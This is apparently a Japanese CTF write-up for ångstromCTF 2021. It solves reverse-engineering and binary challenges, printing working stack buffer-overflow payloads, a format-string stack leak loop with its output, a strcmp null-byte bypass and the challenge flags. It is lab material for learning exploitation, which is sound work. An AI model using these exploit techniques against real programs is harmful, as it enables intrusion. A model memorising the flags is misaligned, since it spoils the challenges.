![ångstromCTF 2021 writeup[Rev,Binary]](/content/images/size/w2000/2021/04/angstrom2021-4.PNG)
ångstromCTF 2021 writeup[Rev,Binary]
問題ファイルや私が書いたコードは(https://github.com/Vegctrp/CTFs/tree/master/angstrom2021)にあります。
FREE FLAGS!!1!!(rev, 50pts, 740solves)
バイナリをgdbかghidraかidaかなんかに突っ込むと、31337 → 419 723 (積が302937) → bananaの順に入力すればいいことがわかります。
actf{what_do_you_mean_bananas_arent_animals}
Revex(rev, 75pts, 178solves)
flagのみ受理される正規表現が渡されるので、気合で読みます。気合で分解して解読すると以下のようになり、flagが決まります。
- (?=.*re)
- "re"という部分がある
- (?=.{21}[^_]{4}}$)
- 22文字目から4文字連続で"_"以外が並び、26文字目が"}"で終了
- (?=.{14}b[^_]{2})
- 15文字目がb, 16.17文字目が"_"以外
- (?=.{8}[C-L])
- (?=.{8}[B-F])
- (?=.{8}[^B-DF])
- 9文字目は{BCDEF}かつ{CDEHIJKL}で、{BCDF}でない→E
- (?=.{7}G(?
..).{7}t\k ) - 8文字目はG、18文字目はt 9,10文字目と19,20文字目が一致
- (?=.*u[^z].$)
- uは末尾から3番目 zは末尾から2番目ではない
- (?=.{11}(?
[13])s.{2}(?!\k )[13]s) - 12文字目は"1"か"3"、13文字目はs 16文字目は12文字目とは違う文字で"1"か"3" 17文字目はs
- (?=.*.{2})
- "??"という並びがある
- (?=actf{)
- 先頭は"actf{"
- (?=.{21}[p-t])
- 22文字目は{pqrst}
- (?=.*1.*3)
- "1", "3"がこの順に入っている
- (?=.{20}(?=.*u)(?=.*y)(?=.*z)(?=.q)(?=._))
- 21文字目以降に{uyzq_}が一つ以上ずつ入っている
- (?=.*Ex)
- Exが入っている
actf{reGEx_1s_b3stEx_qzuy}
Secure Login(Binary, 50pts, 318solves)
dev/urandomから取ってきたパスワードと入力をstrcmpで比較しています。
strcmpはヌル文字を文字列の最後尾と認識するので、入力をヌル文字のみにして、dev/urandomから取っているパスワードの先頭がヌル文字\x00になる1/256を引くまで回し続けるといつか当たります。
actf{if_youre_reading_this_ive_been_hacked}
tranquil(Binary, 70pts, 488solves)
入力をgets(&password);を使ってchar password[64];に格納しているので、入力をchar password[64];から溢れさせたい気持ちになります。RIPレジスタをwin()関数のアドレスである0x401196に書き換えるようにするとwin()関数を呼んでくれます。
echo -e 'password123\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x96\x11\x40\x00' | ./tranquil
actf{time_has_gone_so_fast_watching_the_leaves_fall_from_our_instruction_pointer_864f647975d259d7a5bee6e1}
Sanity Checks(Binary, 80pts, 374solves)
gets(&password);を使ってchar password[64];を溢れさせたい気持ちになります。
ローカル変数は
char password[64];
int ways_to_leave_your_lover = 0; # 0x32にしたい
int what_i_cant_drive = 0; # 0x37にしたい
int when_im_walking_out_on_center_circle = 0; # 0xf5にしたい
int which_highway_to_take_my_telephones_to = 0; # 0x3dにしたい
int when_i_learned_the_truth = 0; # 0x11にしたい
となっているので、対応する部分を然るべき値に書き換えてやると通ります。
echo -e 'password123\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x11\x00\x00\x00\x3d\x00\x00\x00\xf5\x00\x00\x00\x37\x00\x00\x00\x32\x00\x00\x00' | ./checks
actf{if_you_aint_bout_flags_then_i_dont_mess_with_yall}
stickystacks(Binary, 90pts, 309solves)
fgets(name, 6, stdin);で入力を6文字受け付けた後、printf(name);をしているので、書式文字列攻撃の気持ちになります。入力に%1$pといれるとスタックの中身を読めるという定番のアレです。雑に
for ((i=1;i<=100;i++)); do
echo $i
echo %$i\$p | ./stickystacks
done
とすると
33
Name:
Welcome, 0x6c65777b66746361
34
Name:
Welcome, 0x61625f6d27695f6c
35
Name:
Welcome, 0x6c625f6e695f6b63
36
Name:
Welcome, 0x5f7365795f6b6361
37
Name:
Welcome, 0x6b6361625f6d2769
38
Name:
Welcome, 0x5f6568745f6e695f
39
Name:
Welcome, 0x65625f6b63617473
40
Name:
Welcome, 0x3439323135623963
41
Name:
Welcome, 0x3438363737646165
42
Name:
Welcome, 0xa7d333935663161
という部分があったので、これをくっつけてデコードすると勝ちです。
actf{well_i'm_back_in_black_yes_i'm_back_in_the_stack_bec9b51294ead77684a1f593}